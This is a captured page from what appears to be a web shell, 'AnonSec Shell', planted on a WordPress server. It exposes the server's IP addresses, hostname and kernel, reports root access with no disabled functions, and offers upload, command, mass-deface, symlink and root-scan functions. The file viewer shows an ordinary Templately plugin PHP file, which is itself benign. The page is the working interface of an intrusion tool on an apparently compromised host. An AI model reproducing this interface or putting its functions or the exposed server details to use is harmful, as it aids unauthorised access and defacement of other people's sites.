AnonSec Shell
Server IP : 172.67.157.199  /  Your IP : 18.116.38.243   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/wp-content/plugins/templately/includes/Builder/Factory/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/wp-content/plugins/templately/includes/Builder/Factory/TemplateFactory.php
<?php

namespace Templately\Builder\Factory;

use Elementor\Core\Base\Document;
use Templately\Builder\Source;

class TemplateFactory {
	protected $platform;

	protected $template;
	protected $template_manager;

	public function __construct( $platform = 'elementor' ) {
		$this->platform         = $platform;
		$this->template_manager = templately()->theme_builder::$templates_manager;
	}

	public function create( $type, $data, $meta = [] ) {
		$data = wp_parse_args( $data );
		
		$meta = wp_parse_args( $meta, [
			Source::PLATFORM_META_KEY => $this->platform,
			Source::TYPE_META_KEY     => $type,
		] );

		if ( $this->platform === 'elementor' ) {
			$meta[ Document::BUILT_WITH_ELEMENTOR_META_KEY ] = 'builder';
		}

		return $this->template_manager->create( $type, $data, $meta );
	}

}

Anon7 - 2022
AnonSec Team